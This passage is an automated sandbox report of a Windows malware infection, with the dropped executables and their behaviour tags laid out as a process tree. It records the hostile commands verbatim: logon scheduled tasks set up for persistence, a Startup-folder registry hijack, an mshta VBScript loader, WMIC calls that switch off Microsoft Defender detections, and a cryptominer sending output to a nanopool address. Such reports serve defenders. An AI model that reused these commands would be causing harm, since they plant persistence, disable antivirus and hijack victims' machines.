C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\02kuqdey.noz\app.exe /8-2222 & exit9⤵PID:9512
-
C:\Users\Admin\AppData\Local\Temp\02kuqdey.noz\app.exeC:\Users\Admin\AppData\Local\Temp\02kuqdey.noz\app.exe /8-222210⤵PID:8688
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8688 -s 30011⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:9636
-
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun157ff8e4440aa.exe4⤵
- Suspicious use of WriteProcessMemory
PID:3916 -
C:\Users\Admin\AppData\Local\Temp\7zS82EC2883\Sun157ff8e4440aa.exeSun157ff8e4440aa.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4620 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
- Executes dropped EXE
PID:1100 -
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵
- Executes dropped EXE
PID:1364 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵PID:4492
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
PID:5068
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5836 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵PID:1960
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
PID:8392
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth9⤵PID:4596
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3260 -
C:\ProgramData\7622836.exe"C:\ProgramData\7622836.exe"8⤵PID:5292
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5292 -s 22929⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:1384
-
-
-
C:\ProgramData\8399659.exe"C:\ProgramData\8399659.exe"8⤵
- Executes dropped EXE
PID:4616
-
-
C:\ProgramData\3140108.exe"C:\ProgramData\3140108.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:1160 -
C:\ProgramData\3140108.exe"C:\ProgramData\3140108.exe"9⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2056
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1160 -s 10809⤵
- Program crash
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:5388
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5148 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5148 -s 16608⤵
- Program crash
PID:5872
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
- Executes dropped EXE
PID:5188 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5188 -s 6088⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:5232
-
-
-
C:\Users\Admin\AppData\Local\Temp\udptest.exe"C:\Users\Admin\AppData\Local\Temp\udptest.exe"7⤵
- Executes dropped EXE
PID:5408 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5408 -s 2168⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
PID:6044
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"7⤵
- Executes dropped EXE
PID:5528 -
C:\Users\Admin\AppData\Local\Temp\is-OJLTN.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-OJLTN.tmp\setup_2.tmp" /SL5="$10226,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5708 -
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT9⤵
- Executes dropped EXE
PID:5840 -
C:\Users\Admin\AppData\Local\Temp\is-C3AB1.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-C3AB1.tmp\setup_2.tmp" /SL5="$20226,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT10⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:6048
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe"7⤵
- Executes dropped EXE
PID:5652 -
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a8⤵
- Executes dropped EXE
PID:3084
-
-
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"7⤵
- Executes dropped EXE
PID:5788
-
-
C:\Users\Admin\AppData\Local\Temp\8.exe"C:\Users\Admin\AppData\Local\Temp\8.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5904 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵
- Executes dropped EXE
PID:5632 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\SoftID\xender.bat" "9⤵PID:3624
-
C:\Users\Admin\AppData\Roaming\SoftID\inupda.exeinupda.exe10⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3700 -
C:\Users\Admin\AppData\Roaming\SoftID\inupda.exeinupda.exe11⤵
- Executes dropped EXE
PID:5612 -
C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe"C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe"12⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:732 -
C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe"C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe"13⤵
- Executes dropped EXE
PID:5760 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\e0171c4c73\14⤵PID:5508
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\e0171c4c73\15⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:772
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe" /F14⤵
- Creates scheduled task(s)
PID:3900
-
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\SoftID\FoxyIDM621d.exeFoxyIDM621d.exe10⤵
- Executes dropped EXE
PID:5152 -
C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp"C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp" -d "C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\"11⤵
- Executes dropped EXE
PID:4184
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6028
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun150faeb3537d.exe4⤵
- Suspicious use of WriteProcessMemory
PID:2400 -
C:\Users\Admin\AppData\Local\Temp\7zS82EC2883\Sun150faeb3537d.exeSun150faeb3537d.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:772 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 772 -s 19206⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
PID:5448
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun157a449716c8ee483.exe /mixone4⤵
- Suspicious use of WriteProcessMemory
PID:5004 -
C:\Users\Admin\AppData\Local\Temp\7zS82EC2883\Sun157a449716c8ee483.exeSun157a449716c8ee483.exe /mixone5⤵
- Executes dropped EXE
PID:3284 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3284 -s 2846⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4136
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1584240df9fe73a3.exe4⤵
- Suspicious use of WriteProcessMemory
PID:4744
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun15223697c98.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1104
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS82EC2883\Sun1584240df9fe73a3.exeSun1584240df9fe73a3.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1096 -
C:\ProgramData\8602585.exe"C:\ProgramData\8602585.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5008 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5008 -s 23083⤵
- Program crash
PID:4648
-
-
-
C:\ProgramData\1565846.exe"C:\ProgramData\1565846.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
PID:5356 -
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
PID:4624
-
-
-
C:\ProgramData\3439763.exe"C:\ProgramData\3439763.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1668 -
C:\ProgramData\3439763.exe"C:\ProgramData\3439763.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6060
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1668 -s 10763⤵
- Program crash
PID:772
-
-
-
C:\ProgramData\3761427.exe"C:\ProgramData\3761427.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5768 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5768 -s 24363⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:740
-
-
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv dn8LwwbFRkCXo9mq/8woaw.0.21⤵
- Modifies data under HKEY_USERS
PID:1424
-
C:\Users\Admin\AppData\Local\Temp\7zS82EC2883\Sun15223697c98.exeSun15223697c98.exe1⤵
- Executes dropped EXE
PID:4652 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4652 -s 2962⤵
- Program crash
PID:1668
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 3284 -ip 32841⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4804
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4652 -ip 46521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1012
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 860 -ip 8601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4680
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 772 -ip 7721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5280
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 660 -p 5148 -ip 51481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5600
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 5188 -ip 51881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3104
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:5384 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:3416 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 4563⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:4176
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 3416 -ip 34161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5328
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 5408 -ip 54081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5764
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1668 -ip 16681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5080
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 1160 -ip 11601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5988
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:4376 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:5880 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5880 -s 4603⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:6000
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5880 -ip 58801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5416
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 668 -p 5008 -ip 50081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5780
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 416 -p 5292 -ip 52921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4800
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5768 -ip 57681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6088
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4912
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 5292 -ip 52921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Enumerates system info in registry
PID:5448
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5676 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 19628A5A3F9E7529B1AA7EBCA96C9318 C2⤵
- Loads dropped DLL
PID:2980
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 85DA3348F21DC97EDC8C95B9C5F66D852⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:7496 -
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
PID:6288
-
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 263775E5A630469A2A982B4475EED0D8 E Global\MSI00002⤵
- Loads dropped DLL
- Drops file in Windows directory
PID:6016
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:1176 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:5196
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5196 -s 4523⤵
- Program crash
PID:3012
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 5196 -ip 51961⤵PID:2108
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 4076 -ip 40761⤵PID:6160
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1560 -ip 15601⤵PID:6328
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2224 -ip 22241⤵PID:6336
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:7240
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 6780 -ip 67801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4932
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 668 -p 3696 -ip 36961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6384
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 7732 -ip 77321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5532
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
- Modifies data under HKEY_USERS
PID:7140
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 6772 -ip 67721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7256
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 7856 -ip 78561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:8616
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 732 -p 6328 -ip 63281⤵PID:8900
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:8780
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 756 -p 7668 -ip 76681⤵PID:8320
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 816 -p 6224 -ip 62241⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1692
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 796 -p 6812 -ip 68121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2572
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 824 -p 6736 -ip 67361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:8488
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 752 -p 3560 -ip 35601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:8996
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 7776 -ip 77761⤵PID:8800
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 704 -p 7564 -ip 75641⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:8400
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt: CloSE ( CReATEobJECT ( "WscrIpt.SheLL").Run( "cmD.exe /Q /c TYPE ""C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE"" > X4d4XArNWDu.eXE&& StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV & if ""-PXPoqL0iOUHHP7hXFattB5ZvsV ""== """" for %A IN (""C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE"" ) do taskkill /f -im ""%~nxA"" " , 0, trUE ) )1⤵PID:8640
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /c TYPE "C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE"> X4d4XArNWDu.eXE&& StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV &if "-PXPoqL0iOUHHP7hXFattB5ZvsV "== "" for %A IN ("C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE" ) do taskkill /f -im "%~nxA"2⤵PID:8188
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 828 -p 7556 -ip 75561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6692
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:6320
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 704 -p 7548 -ip 75481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6432
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "5TOoLBEwKjxTgqEGuFABMEWV" /sc ONLOGON /tr "'C:\Users\Admin\Documents\5TOoLBEwKjxTgqEGuFABMEWV\5TOoLBEwKjxTgqEGuFABMEWV.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4068
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\cmd.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:8132
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Q09ckwfoQ4QNEIehWCYu8jha" /sc ONLOGON /tr "'C:\PerfLogs\Q09ckwfoQ4QNEIehWCYu8jha.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2612
-
C:\Users\Admin\AppData\Local\Temp\7zS97EB.tmp\SimplInst.exe.\SimplInst.exe1⤵PID:9036
-
C:\Users\Admin\AppData\Local\Temp\7zS9AF9.tmp\SimplInst.exe.\SimplInst.exe /S /site_id "668658"2⤵
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
PID:7076 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &3⤵PID:5752
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"4⤵PID:5588
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"4⤵PID:8872
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:5736
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:9544 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True7⤵PID:9528
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
- Drops file in Program Files directory
PID:2176 -
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:8076
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True6⤵PID:6452
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True7⤵PID:11900
-
-
-
-
-
